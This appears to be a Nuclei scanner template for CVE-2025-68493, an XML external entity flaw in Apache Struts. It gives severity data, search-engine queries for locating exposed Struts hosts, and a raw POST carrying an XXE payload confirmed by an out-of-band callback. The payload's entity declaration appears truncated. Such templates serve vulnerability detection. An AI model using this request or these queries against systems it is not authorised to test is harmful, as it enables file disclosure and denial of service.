id: CVE-2025-68493 info: name: Apache Struts XWork - XML External Entity Injection author: pussycat0x severity: high description: | Apache Struts 2.0.0 < 2.2.1 and 2.2.1 <= versions <= 6.1.0 contain an XML external entity injection caused by missing XML validation, letting attackers potentially disclose files or cause denial of service, exploit requires crafted XML input impact: | Attackers can disclose sensitive files or cause denial of service by exploiting XML processing. remediation: | Upgrade to version 6.1.1. reference: - https://cwiki.apache.org/confluence/display/WW/S2-069 - https://github.com/hsltz/CVE-2025-68493 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H cvss-score: 8.1 cve-id: CVE-2025-68493 cwe-id: CWE-611 epss-score: 0.39504 epss-percentile: 0.98515 metadata: verified: true max-request: 2 vendor: apache product: struts shodan-query: - http.html:"Apache Struts" - http.html:"struts problem report" - http.title:"Struts2 Showcase" fofa-query: - body="struts problem report" - app="apache_struts" - title="Struts2 Showcase" google-query: intitle:"struts2 showcase" tags: cve,cve2025,apache,struts,struts2,xxe,oast,oob,vkev flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" matchers-condition: and matchers: - type: word part: body words: - 'Struts' case-insensitive: true internal: true - raw: - | POST /struts2-xml-parser/xmlParserNoDtdParse HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Connection: close ]>&xxe; matchers: - type: word part: interactsh_protocol words: - "dns" - "http" condition: or # digest: 490a00463044022053b3403b430240f963dae772232ab949b2ed5dce6e72a0eb8295d48bc55f7f150220769b6ff236c729ce95ae5372391fee47a38ec4ffb419759bbf224764e2ee0bdc:922c64590222798bb761d5b6d8e72950